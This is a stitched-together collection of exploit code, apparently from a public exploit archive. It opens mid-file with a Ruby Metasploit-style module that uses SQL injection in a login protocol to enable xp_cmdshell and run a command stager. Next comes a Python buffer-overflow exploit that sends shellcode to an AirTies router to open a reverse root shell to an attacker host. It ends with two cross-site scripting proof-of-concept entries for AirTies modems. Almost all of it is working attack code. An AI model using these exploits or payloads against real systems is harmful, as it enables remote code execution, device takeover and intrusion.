          # 0xFF is the protocol's field delimiter (see create_login_msg),
          # 0x27 the single quote that closes the injected string.
          'BadChars' => "\x00\xff\x27",
        },
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget' => 0,
      'DisclosureDate' => '2019-03-27',
      'DefaultOptions' =>
        {
          'RPORT' => 5099
        },
    ))
  end

  # Required by the CmdStager mixin, which calls it once per stager line:
  # each line is run through xp_cmdshell via the login injection.
  def execute_command(cmd, _opts)
    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
    send_login_msg(create_login_msg_sql(cmd_xp))
  end

  # Prepends the required length to the message and sends it to the server.
  # The length prefix counts the message plus the digits of the prefix itself.
  # Returns the (single) recv() chunk; a fresh TCP connection is used per call.
  def send_login_msg(login_msg, check_response = true)
    length = login_msg.length
    length += length.to_s.length
    login_msg = "#{length}#{login_msg}"
    connect
    sock.put(login_msg)
    response = sock.recv(10000)
    if check_response
      # Heuristic: the login is expected to be rejected ("Zugangsdaten
      # Falsch" = wrong credentials) while the injected statement still ran;
      # the length check guards against a truncated reply.
      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
        print_good('Correct response received => Data send successfully')
      else
        print_warning('Wrong response received => Probably data could not be sent successfully')
      end
    end
    return response
  ensure
    # Every time a new Connection is required
    disconnect
  end

  # Embeds a SQL command into the login message: a random password closes
  # the quoted string, the statement follows, and `--` comments out the rest.
  def create_login_msg_sql(sql_cmd)
    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
  end

  # Create a plain login message: 0xFF-delimited fields with static values
  # except the password slot (`pw`). Returns the assembled string.
  def create_login_msg(pw)
    delim = "\xFF"
    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
"#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
  end

  # Vulnerability check: a tautology in the password slot that is answered
  # with 'Zugangsdaten OK' (credentials OK) proves the injection.
  def check
    int = rand(1..1_000)
    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
    if response_bypass.include? 'Zugangsdaten OK'
      CheckCode::Vulnerable
    else
      print_status("Response was: #{response_bypass}")
      CheckCode::Safe
    end
  end

  def exploit
    # enable xp cmdshell, used to execute commands later
    # Software uses the 'sa' user by default
    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
    # The protocol has no limit on max data
    execute_cmdstager({ :linemax => 1500 })
    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
    print_status('Stager should now be executed.')
  end
end
#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################
import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib
if __name__ == '__main__':
    try:
        ip = sys.argv[1]
        revhost = sys.argv[2]
        revport = sys.argv[3]
    except:
        # NOTE(review): usage is printed but the script keeps running, so a
        # missing argument surfaces as a NameError on `revhost` below instead
        # of a clean exit.
        print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]
    # Listener address and port as big-endian integers; they are split into
    # the byte pairs patched into the shellcode below.
    host = struct.unpack('>L',socket.inet_aton(revhost))[0]
    port = string.atoi(revport)
    # Connect-back shellcode (presumably MIPS, judging by the encoding; the
    # page does not say). The "\x3c\x0e"/"\x35\xce" lines carry the port and
    # host bytes.
    shellcode = ""
    shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
    shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
    shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
    shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
    shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
    shellcode += "\xaf\xae\xff\xe4"
    shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
    shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
    shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
    shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
    shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
    shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
    shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
    shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
    shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
    shellcode += "\x01\x01\x01\x0c"
    # Overflow buffer: "A" filler, several fixed 4-byte addresses (their
    # meaning is not documented on the page), the shellcode, then a tail of
    # repeated 4-byte values.
    data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40"
    data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C"
    data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48
    # The oversized value is sent in the login form's `redirect` field with
    # static credentials; an abnormally long `redirect` in a POST to
    # /cgi-bin/login is the obvious detection signature.
    pdata = {
        'redirect' : data,
        'self' : '1',
        'user' : 'tanri',
        'password' : 'ihtiyacmyok',
        'gonder' : 'TAMAM'
    }
    login_data = urllib.urlencode(pdata)
    #print login_data
    url = 'http://%s/cgi-bin/login' % ip
    header = {}
    req = urllib2.Request(url, login_data, header)
    # Nothing is read from the response; any result is only visible on the
    # listener side.
    rsp = urllib2.urlopen(req)
# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
# Date: 2018-07-06
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: airties.com
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# CVE-ID: CVE-2018-8738
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype=
# Proof of Concepts:
192.168.2.1/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E
# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
# Date: 25-09-2018
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: [https://www.airties.com/]
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
# A cross-site scripting vulnerability has been discovered in the AirTies AIR5342 modem.
# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.
# HTTP Requests :
GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1